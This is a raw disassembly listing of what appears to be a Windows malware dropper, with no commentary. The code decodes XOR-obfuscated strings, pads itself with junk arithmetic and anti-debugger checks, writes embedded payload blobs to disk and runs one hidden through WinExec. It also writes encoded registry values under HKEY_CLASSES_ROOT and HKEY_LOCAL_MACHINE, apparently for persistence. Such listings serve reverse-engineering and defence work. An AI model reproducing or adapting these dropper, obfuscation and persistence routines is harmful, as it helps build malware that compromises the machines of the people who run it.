sub_40341E proc near ; CODE XREF: sub_403A5F+7D�p
; sub_403BE7+24E�p ...
var_10A = word ptr -10Ah
var_108 = word ptr -108h
String = byte ptr -106h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+String]
push eax
push [ebp+arg_0]
call sub_403370
mov [ebp+var_108], 1417h
add [ebp+var_108], 7A22h
push 2 ; Size
push offset word_44758A ; Src
call sub_4032E2
push eax ; Source
lea edi, [ebp+String]
push edi ; Dest
call strcat ; strcat
add esp, 18h
mov [ebp+var_2], 4444h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
lea eax, [ebp+String]
push eax ; lpString
call GlobalAddAtomA ; GlobalAddAtomA
mov ax, word_43D14D
mov [ebp+var_10A], ax
pop edi
leave
retn
sub_40341E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40349A proc near ; CODE XREF: sub_4098A8+2D8�p
; sub_4098A8+388�p ...
var_112 = byte ptr -112h
var_10C = dword ptr -10Ch
var_108 = word ptr -108h
var_106 = word ptr -106h
String = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 114h
push ebx
push esi
push edi
mov ax, word_43D14F
mov [ebp+var_108], ax
mov eax, dword_43D151
mov [ebp+var_10C], eax
call GetCurrentThreadId ; GetCurrentThreadId
lea eax, [ebp+String]
push eax
push [ebp+arg_0]
call sub_403370
call GetTickCount ; GetTickCount
push 2 ; Size
push offset word_44758A ; Src
call sub_4032E2
push eax ; Source
lea edi, [ebp+String]
push edi ; Dest
call strcat ; strcat
add esp, 18h
call GetLastError
loc_4034F8: ; CODE XREF: sub_40349A+AE�j
lea eax, [ebp+String]
push eax ; lpString
call GlobalFindAtomA ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_106], di
lea edi, [ebp+var_112]
lea esi, byte_43D155
mov ecx, 3
rep movsw
cmp [ebp+var_106], 0
jz short loc_40354A
mov ebx, 4056h
add ebx, 1CB6h
movzx eax, [ebp+var_106]
push eax ; nAtom
call GlobalDeleteAtom ; GlobalDeleteAtom
call GetProcessHeap ; GetProcessHeap
jmp short loc_4034F8
; ---------------------------------------------------------------------------
loc_40354A: ; CODE XREF: sub_40349A+8F�j
pop edi
pop esi
pop ebx
leave
retn
sub_40349A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40354F(void *Src, size_t Size)
sub_40354F proc near ; CODE XREF: sub_4035DB+A0�p
; sub_4036BC+34�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
mov [ebp+var_4], 1EAh
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_43D164
lea eax, ds:40E180h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_403597
; ---------------------------------------------------------------------------
loc_40357D: ; CODE XREF: sub_40354F+4A�j
mov eax, dword_43D164
add eax, edi
lea eax, ds:40E180h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D3h
mov [eax], dl
inc edi
loc_403597: ; CODE XREF: sub_40354F+2C�j
cmp edi, esi
jl short loc_40357D
mov [ebp+var_8], 278h
mov eax, dword_43D164
add eax, esi
mov byte ptr dword_40E180[eax], 0
mov edi, dword_43D164
mov eax, edi
add eax, 6
add eax, esi
mov dword_43D164, eax
cmp eax, 0DCEh
jle short loc_4035D1
and dword_43D164, 0
loc_4035D1: ; CODE XREF: sub_40354F+79�j
lea eax, dword_40E180[edi]
pop edi
pop esi
leave
retn
sub_40354F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4035DB(int Val, char *Dest, char *Source)
sub_4035DB proc near ; CODE XREF: sub_4036BC+41�p
var_3F = byte ptr -3Fh
var_38 = byte ptr -38h
DstBuf = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
Val = dword ptr 8
Dest = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
mov ebx, [ebp+Dest]
lea edi, [ebp+var_38]
lea esi, byte_43D168
mov ecx, 3
rep movsb
lea edi, [ebp+var_3F]
lea esi, byte_43D16B
mov ecx, 7
rep movsb
call GetVersion ; GetVersion
mov eax, dword_43D15C
inc eax
push eax ; Radix
lea eax, [ebp+DstBuf]
push eax ; DstBuf
push [ebp+Val] ; Val
call _itoa ; _itoa
add esp, 0Ch
call GetTickCount ; GetTickCount
lea ecx, [ebp+DstBuf]
or eax, 0FFFFFFFFh
loc_40362D: ; CODE XREF: sub_4035DB+57�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40362D
mov edx, eax
mov [ebp+var_2], dl
call GetLastError
mov [ebp+var_1], 0
jmp short loc_40365A
; ---------------------------------------------------------------------------
loc_403644: ; CODE XREF: sub_4035DB+89�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+DstBuf]
mov [ebx+edx], al
add [ebp+var_1], 1
loc_40365A: ; CODE XREF: sub_4035DB+67�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_403644
movzx eax, [ebp+var_2]
mov byte ptr [ebx+eax], 0
mov [ebp+var_3], 0
jmp short loc_40368E
; ---------------------------------------------------------------------------
loc_403674: ; CODE XREF: sub_4035DB+C4�j
push 1 ; Size
push offset byte_447588 ; Src
call sub_40354F
push eax ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 10h
add [ebp+var_3], 1
loc_40368E: ; CODE XREF: sub_4035DB+97�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_403674
call IsDebuggerPresent ; IsDebuggerPresent
push [ebp+Source] ; Source
push ebx ; Dest
call strcat ; strcat
add esp, 8
call GetTickCount ; GetTickCount
pop edi
pop esi
pop ebx
leave
retn
sub_4035DB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4036BC(int Val)
sub_4036BC proc near ; CODE XREF: sub_40AA24+694�p
var_3C = byte ptr -3Ch
Dest = byte ptr -36h
var_4 = word ptr -4
var_1 = byte ptr -1
Val = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
push edi
mov ebx, 65DBh
sub ebx, 2975h
lea edi, [ebp+var_3C]
lea esi, word_43D172
mov ecx, 3
rep movsw
mov [ebp+var_1], 1Bh
sub [ebp+var_1], 0FBh
push 1 ; Size
push offset word_447586 ; Src
call sub_40354F
push eax ; Source
lea edi, [ebp+Dest]
push edi ; Dest
push [ebp+Val] ; Val
call sub_4035DB
add esp, 14h
mov [ebp+var_4], 23Ah
sub [ebp+var_4], 4D70h
lea eax, [ebp+Dest]
push eax ; lpString
call GlobalAddAtomA ; GlobalAddAtomA
mov ebx, 858h
mov eax, ebx
add eax, ebx
mov ebx, eax
pop edi
pop esi
pop ebx
leave
retn
sub_4036BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40372A(void *Src, size_t Size)
sub_40372A proc near ; CODE XREF: sub_4037CA+37�p
; .text:0040389B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_43D180
lea eax, ds:40F6E0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_403768
; ---------------------------------------------------------------------------
loc_403751: ; CODE XREF: sub_40372A+40�j
mov eax, dword_43D180
add eax, edi
lea eax, ds:40F6E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 75h
mov [eax], dl
inc edi
loc_403768: ; CODE XREF: sub_40372A+25�j
cmp edi, esi
jl short loc_403751
mov [ebp+var_4], 2E3h
mov eax, dword_43D180
add eax, esi
mov byte ptr dword_40F6E0[eax], 0
xor edi, edi
mov edi, dword_43D180
inc dword_43D180
mov eax, dword_43D180
add eax, 5
add eax, esi
mov dword_43D180, eax
add dword_43D180, 2
cmp dword_43D180, 0DF6h
jle short loc_4037B9
and dword_43D180, 0
loc_4037B9: ; CODE XREF: sub_40372A+86�j
mov [ebp+var_8], 1Ch
lea eax, dword_40F6E0[edi]
pop edi
pop esi
leave
retn
sub_40372A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4037CA(char *Format, char *Source)
sub_4037CA proc near ; CODE XREF: sub_40AA24+728�p
; sub_40AA24+74F�p
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_106 = word ptr -106h
String = byte ptr -104h
Format = dword ptr 8
Source = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov [ebp+var_106], 56C6h
sub [ebp+var_106], 2AE0h
call GetTickCount ; GetTickCount
push [ebp+Format] ; Format
lea eax, [ebp+String]
push eax ; Dest
call sprintf ; sprintf
push 1 ; Size
push offset byte_447584 ; Src
call sub_40372A
push eax ; Source
lea edi, [ebp+String]
push edi ; Dest
call strcat ; strcat
mov [ebp+var_108], 14CDh
sub [ebp+var_108], 24h
push [ebp+Source] ; Source
lea eax, [ebp+String]
push eax ; Dest
call strcat ; strcat
add esp, 20h
lea eax, [ebp+String]
push eax ; lpString
call GlobalAddAtomA ; GlobalAddAtomA
mov [ebp+var_10A], 31AAh
movzx eax, [ebp+var_10A]
imul eax, 32E4h
mov [ebp+var_10A], ax
pop edi
leave
retn
sub_4037CA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
lea edi, [ebp-10Dh]
lea esi, dword_43D184
mov ecx, 7
rep movsb
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sprintf ; sprintf
call IsDebuggerPresent ; IsDebuggerPresent
push 1
push offset byte_447584
call sub_40372A
push eax
lea edi, [ebp-104h]
push edi
call strcat ; strcat
call GetLastError
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call strcat ; strcat
add esp, 20h
loc_4038C4: ; CODE XREF: .text:00403908�j
lea eax, [ebp-104h]
push eax
call GlobalFindAtomA ; GlobalFindAtomA
mov edi, eax
mov [ebp-106h], di
cmp word ptr [ebp-106h], 0
jz short loc_40390A
lea edi, [ebp-110h]
lea esi, byte_43D18B
mov ecx, 3
rep movsb
movzx eax, word ptr [ebp-106h]
push eax
call GlobalDeleteAtom ; GlobalDeleteAtom
call GetTickCount ; GetTickCount
jmp short loc_4038C4
; ---------------------------------------------------------------------------
loc_40390A: ; CODE XREF: .text:004038E1�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40390E(void *Src, size_t Size)
sub_40390E proc near ; CODE XREF: sub_40399B+82�p
; sub_403A5F+58�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+Size]
mov [ebp+var_4], 200h
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_43D198
lea eax, ds:41E9E0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_8], 100h
xor edi, edi
jmp short loc_40395D
; ---------------------------------------------------------------------------
loc_403943: ; CODE XREF: sub_40390E+51�j
mov eax, dword_43D198
add eax, edi
lea eax, ds:41E9E0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_40395D: ; CODE XREF: sub_40390E+33�j
cmp edi, esi
jl short loc_403943
mov eax, dword_43D198
add eax, esi
mov byte ptr dword_41E9E0[eax], 0
xor edi, edi
mov edi, dword_43D198
mov eax, edi
lea eax, [eax+esi+1]
mov dword_43D198, eax
cmp eax, 0DCCh
jle short loc_403991
and dword_43D198, 0
loc_403991: ; CODE XREF: sub_40390E+7A�j
lea eax, dword_41E9E0[edi]
pop edi
pop esi
leave
retn
sub_40390E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40399B(char *Dest)
sub_40399B proc near ; CODE XREF: sub_403A5F+34�p
; sub_403BE7+139�p ...
var_100B = byte ptr -100Bh
VolumeSerialNumber= dword ptr -1008h
RootPathName = byte ptr -1003h
var_1000 = byte ptr -1000h
FileSystemFlags = dword ptr -4
Dest = dword ptr 8
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_40C6B8
push ebx
push esi
push edi
mov ebx, [ebp+Dest]
lea edi, [ebp+var_100B]
lea esi, word_4421BE
mov ecx, 3
rep movsb
push 0FFFh ; uSize
lea eax, [ebp+RootPathName]
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
call GetTickCount ; GetTickCount
mov [ebp+var_1000], 0
push 0FFFh ; nFileSystemNameSize
lea eax, [ebp+RootPathName]
push eax ; lpFileSystemNameBuffer
lea eax, [ebp+FileSystemFlags]
push eax ; lpFileSystemFlags
lea eax, [ebp+FileSystemFlags]
push eax ; lpMaximumComponentLength
lea eax, [ebp+VolumeSerialNumber]
push eax ; lpVolumeSerialNumber
push 0FFFh ; nVolumeNameSize
lea eax, [ebp+RootPathName]
push eax ; lpVolumeNameBuffer
lea eax, [ebp+RootPathName]
push eax ; lpRootPathName
call GetVolumeInformationA ; GetVolumeInformationA
call GetCurrentThreadId ; GetCurrentThreadId
push 4 ; Size
push offset byte_44757F ; Src
call sub_40390E
push [ebp+VolumeSerialNumber]
push eax ; Format
push ebx ; Dest
call sprintf ; sprintf
add esp, 14h
call GetCurrentThreadId ; GetCurrentThreadId
and [ebp+FileSystemFlags], 0
loc_403A3B: ; CODE XREF: sub_40399B+BD�j
mov eax, [ebp+FileSystemFlags]
mov al, [ebx+eax]
cmp al, 41h
jge short loc_403A51
cmp al, 30h
jle short loc_403A51
mov eax, [ebp+FileSystemFlags]
add eax, ebx
add byte ptr [eax], 11h
loc_403A51: ; CODE XREF: sub_40399B+A8�j
; sub_40399B+AC�j
inc [ebp+FileSystemFlags]
cmp [ebp+FileSystemFlags], 8
jb short loc_403A3B
pop edi
pop esi
pop ebx
leave
retn
sub_40399B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A5F proc near ; CODE XREF: sub_40AA24+7D2�p
var_28F = byte ptr -28Fh
var_28A = byte ptr -28Ah
NumberOfBytesWritten= dword ptr -284h
var_27D = dword ptr -27Dh
var_279 = byte ptr -279h
var_273 = byte ptr -273h
var_26C = byte ptr -26Ch
Source = byte ptr -26Bh
Dest = byte ptr -167h
var_103 = byte ptr -103h
var_102 = word ptr -102h
FileName = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call GetCurrentProcessId ; GetCurrentProcessId
lea edi, [ebp+var_26C]
lea esi, byte_4421C1
xor ecx, ecx
inc ecx
rep movsb
mov ebx, 1763h
add ebx, 25D9h
lea eax, [ebp+Dest]
push eax ; Dest
call sub_40399B
call GetProcessHeap ; GetProcessHeap
lea edi, [ebp+var_273]
lea esi, word_4421C2
mov ecx, 7
rep movsb
push 9 ; Size
push offset byte_447575 ; Src
call sub_40390E
lea edi, [ebp+Dest]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+FileName]
push edi ; Dest
call sprintf ; sprintf
lea eax, [ebp+FileName]
push eax
call sub_40341E
lea edi, [ebp+var_279]
lea esi, byte_4421C9
mov ecx, 3
rep movsw
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov ebx, eax
mov eax, dword_4421CF
mov [ebp+var_27D], eax
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 3621h ; nNumberOfBytesToWrite
push offset byte_43EB9D ; lpBuffer
push ebx ; hFile
call WriteFile ; WriteFile
lea edi, [ebp+var_28A]
lea esi, byte_4421D3
mov ecx, 3
rep movsw
push ebx ; hObject
call CloseHandle ; CloseHandle
call IsDebuggerPresent ; IsDebuggerPresent
lea edi, [ebp+var_28F]
lea esi, byte_4421D9
mov ecx, 5
rep movsb
push 104h ; nSize
lea eax, [ebp+Source]
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
mov [ebp+var_102], 0C80h
sub [ebp+var_102], 4F02h
push 1 ; Size
push offset byte_447573 ; Src
call sub_40390E
push eax ; Source
lea edi, [ebp+FileName]
push edi ; Dest
call strcat ; strcat
mov [ebp+var_103], 94h
add [ebp+var_103], 1
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+FileName]
push eax ; Dest
call strcat ; strcat
add esp, 38h
call GetCurrentProcessId ; GetCurrentProcessId
push 0 ; uCmdShow
lea eax, [ebp+FileName]
push eax ; lpCmdLine
call WinExec ; WinExec
call GetCurrentProcessId ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_403A5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BE7 proc near ; CODE XREF: sub_40AA24+35F�p
var_312 = word ptr -312h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
Format = dword ptr -2F4h
NumberOfBytesWritten= dword ptr -2F0h
var_2E9 = dword ptr -2E9h
var_2E5 = byte ptr -2E5h
var_2DF = dword ptr -2DFh
var_2DB = byte ptr -2DBh
var_2D6 = word ptr -2D6h
var_2D4 = byte ptr -2D4h
ValueName = byte ptr -2CDh
Dest = byte ptr -269h
Data = byte ptr -205h
SubKey = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 314h
push ebx
push esi
push edi
call IsDebuggerPresent ; IsDebuggerPresent
lea edi, [ebp+var_2D4]
lea esi, word_4421DE
mov ecx, 7
rep movsb
call GetProcessHeap ; GetProcessHeap
push 26h ; Size
push offset dword_44754C ; Src
call sub_40390E
mov [ebp+Format], eax
call rand ; rand
mov [ebp+var_2F8], eax
call rand ; rand
mov [ebp+var_2FC], eax
call rand ; rand
mov [ebp+var_300], eax
call rand ; rand
mov [ebp+var_304], eax
call rand ; rand
mov [ebp+var_308], eax
call rand ; rand
mov [ebp+var_30C], eax
call rand ; rand
mov [ebp+var_310], eax
call rand ; rand
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_300]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2FC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F8]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+Format]
push edi ; Format
lea edi, [ebp+Dest]
push edi ; Dest
call sprintf ; sprintf
call GetTickCount ; GetTickCount
mov ax, word_4421E5
mov [ebp+var_2D6], ax
lea eax, [ebp+ValueName]
push eax ; Dest
call sub_40399B
add esp, 34h
call GetLastError
lea edi, [ebp+var_2DB]
lea esi, byte_4421E7
mov ecx, 5
rep movsb
mov eax, dword_4421EC
mov [ebp+var_2DF], eax
call rand ; rand
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+SubKey], dl
call GetTickCount ; GetTickCount
mov [ebp+var_1], 1
jmp short loc_403DAD
; ---------------------------------------------------------------------------
loc_403D7D: ; CODE XREF: sub_403BE7+1CB�j
call rand ; rand
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+SubKey], dl
add [ebp+var_1], 1
loc_403DAD: ; CODE XREF: sub_403BE7+194�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403D7D
mov ebx, 368Ch
mov eax, ebx
add eax, ebx
mov ebx, eax
mov [ebp+var_F9], 0
call rand ; rand
mov edx, eax
test dl, 1
jnz short loc_403DF5
call GetTickCount ; GetTickCount
mov [ebp+var_FB], 33h
mov [ebp+var_312], 25D6h
inc [ebp+var_312]
mov [ebp+var_FA], 32h
loc_403DF5: ; CODE XREF: sub_403BE7+1E9�j
push 9 ; Size
push offset word_447542 ; Src
call sub_40390E
lea edi, [ebp+SubKey]
push edi
push offset Buffer
push eax ; Format
lea edi, [ebp+Data]
push edi ; Dest
call sprintf ; sprintf
lea edi, [ebp+var_2E5]
lea esi, dword_4421F0
mov ecx, 3
rep movsw
lea eax, [ebp+Data]
push eax
call sub_40341E
mov eax, dword_4421F6
mov [ebp+var_2E9], eax
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 0 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+Data]
push eax ; lpFileName
call CreateFileA ; CreateFileA
mov ebx, eax
call GetCurrentThreadId ; GetCurrentThreadId
push [ebp+arg_0] ; Format
mov eax, offset Dest ; "abcdefghijklmno"
push eax ; Dest
call sprintf ; sprintf
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 1A01h ; nNumberOfBytesToWrite
push offset dword_43D19C ; lpBuffer
push ebx ; hFile
call WriteFile ; WriteFile
push ebx ; hObject
call CloseHandle ; CloseHandle
call GetVersion ; GetVersion
push 17h ; Size
push offset word_44752A ; Src
call sub_40390E
lea edi, [ebp+Dest]
push edi
push eax ; Format
lea edi, [ebp+SubKey]
push edi ; Dest
call sprintf ; sprintf
call GetLastError
lea eax, [ebp+Data]
push eax ; lpData
push offset WindowName ; lpValueName
lea eax, [ebp+SubKey]
push eax ; lpSubKey
push 80000000h ; hKey
call sub_403F47
call GetProcessHeap ; GetProcessHeap
push 0Eh ; Size
push offset aNLF ; "±«¼¸½°·¾”¶½¼µ"
call sub_40390E
mov [ebp-314h], eax
push 9 ; Size
push offset aSiLnN ; "˜©¸«´¼·"
call sub_40390E
push eax ; lpData
mov edi, [ebp-314h]
push edi ; lpValueName
lea edi, [ebp+SubKey]
push edi ; lpSubKey
push 80000000h ; hKey
call sub_403F47
push 45h ; Size
push offset aKNoLEfLKNeoOke ; "Š¶¿®¸«¼…”°º«¶ª¶¿…Ž°·½¶®ª…š¬««¼·¼«ª°"...
call sub_40390E
lea edi, [ebp+Dest]
push edi ; lpData
lea edi, [ebp+ValueName]
push edi ; lpValueName
push eax ; lpSubKey
push 80000002h ; hKey
call sub_403F47
add esp, 80h
pop edi
pop esi
pop ebx
leave
retn
sub_403BE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403F47(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, BYTE *lpData)
sub_403F47 proc near ; CODE XREF: sub_403BE7+2EF�p
; sub_403BE7+32B�p ...
var_11 = byte ptr -11h
cbData = dword ptr -10h
var_9 = byte ptr -9
phkResult = dword ptr -8
var_2 = word ptr -2
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov edi, [ebp+lpData]
mov [ebp+var_2], 482Fh
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
inc dword_43C230
mov [ebp+var_9], 0C8h
add [ebp+var_9], 59h
and [ebp+phkResult], 0
lea eax, [ebp+cbData]
push eax ; lpdwDisposition
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0 ; lpSecurityAttributes
push 0F003Fh ; samDesired
push 0 ; dwOptions
push 0 ; lpClass
push 0 ; Reserved
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegCreateKeyExA ; RegCreateKeyExA
call IsDebuggerPresent ; IsDebuggerPresent
mov ecx, edi
or eax, 0FFFFFFFFh
loc_403FA2: ; CODE XREF: sub_403F47+60�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_403FA2
mov [ebp+cbData], eax
push [ebp+cbData] ; cbData
push edi ; lpData
push 1 ; dwType
push 0 ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegSetValueExA ; RegSetValueExA
mov [ebp+var_11], 0A1h
add [ebp+var_11], 0D6h
push [ebp+phkResult] ; hKey
call RegCloseKey ; RegCloseKey
call GetTickCount ; GetTickCount
pop edi
pop esi
leave
retn
sub_403F47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_403FD8(void *Src, size_t Size)
sub_403FD8 proc near ; CODE XREF: sub_40406B+DF�p
; sub_40406B+FF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+Size]
push esi ; Size
push [ebp+Src] ; Src
mov eax, dword_442204
lea eax, ds:411CA0h[eax]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov [ebp+var_4], 278h
xor edi, edi
jmp short loc_404021
; ---------------------------------------------------------------------------
loc_404007: ; CODE XREF: sub_403FD8+4B�j
mov eax, dword_442204
add eax, edi
lea eax, ds:411CA0h[eax] ; DATA XREF: .text:0043F12D�w
; .text:0043F147�w ...
movsx edx, byte ptr [eax]
xor edx, 9Ah
mov [eax], dl
loc_404020: ; DATA XREF: .text:0043F1FA�o
; .text:0043F210�r
inc edi
loc_404021: ; CODE XREF: sub_403FD8+2D�j
cmp edi, esi
jl short loc_404007 ; DATA XREF: .text:0043F20A�r
mov [ebp+var_8], 2C7h ; DATA XREF: .text:0043F204�r
loc_40402C: ; DATA XREF: .text:loc_43F195�r
; .text:loc_43F1A5�r ...
mov eax, dword_442204
add eax, esi
mov byte ptr dword_411CA0[eax], 0 ; DATA XREF: .text:0043F0A3�w
; .text:0043F0BE�r ...
mov edi, dword_442204 ; DATA XREF: .text:0043F0B8�o
; .text:0043F0C6�o
mov eax, edi
lea eax, [eax+esi+6]
mov dword_442204, eax
cmp eax, 0DB8h
jle short loc_40405A
and dword_442204, 0
loc_40405A: ; CODE XREF: sub_403FD8+79�j
mov [ebp+var_C], 2EEh
lea eax, dword_411CA0[edi]
pop edi
pop esi
leave
retn
sub_403FD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40406B proc near ; CODE XREF: sub_40AA24+3B9�p
var_14B3 = byte ptr -14B3h
var_14AF = byte ptr -14AFh
var_14AC = dword ptr -14ACh
NumberOfBytesWritten= dword ptr -14A8h
var_14A4 = byte ptr -14A4h
var_149D = byte ptr -149Dh
var_1496 = word ptr -1496h
FileName = byte ptr -1494h
var_1395 = byte ptr -1395h
VersionInformation= _OSVERSIONINFOA ptr -1394h
Filename = byte ptr -1300h
Dest = byte ptr -1201h
var_1102 = word ptr -1102h
var_1100 = word ptr -1100h
CmdLine = byte ptr -10FEh
Buffer = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14B4h
call sub_40C6B8
push ebx
push esi
push edi
call IsDebuggerPresent ; IsDebuggerPresent
mov ax, word_442208
mov [ebp+var_1496], ax ; DATA XREF: .text:0043F048�w
call GetTickCount ; DATA XREF: .text:0043F04D�w
; .text:0043F069�w
push 0FFh ; DATA XREF: .text:0043F5A8�w
; .text:0043F5AE�r ...
; nSize
lea eax, [ebp+Filename] ; DATA XREF: .text:00440391�r
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
call GetTickCount ; GetTickCount
loc_4040AA: ; DATA XREF: sub_43F624+C�o
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
mov [ebp+var_1100], 47E6h ; DATA XREF: sub_43F624+1C�o
movzx eax, [ebp+var_1100]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1100], ax
lea eax, [ebp+VersionInformation]
push eax ; lpVersionInformation
call GetVersionExA ; GetVersionExA
mov [ebp+var_1102], 21A4h
movzx eax, [ebp+var_1102]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1102], ax
lea edi, [ebp+var_149D]
lea esi, word_44220A
mov ecx, 7
rep movsb
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz loc_4041A4
call GetVersion ; GetVersion
push 0FFh ; uSize
lea eax, [ebp+Buffer]
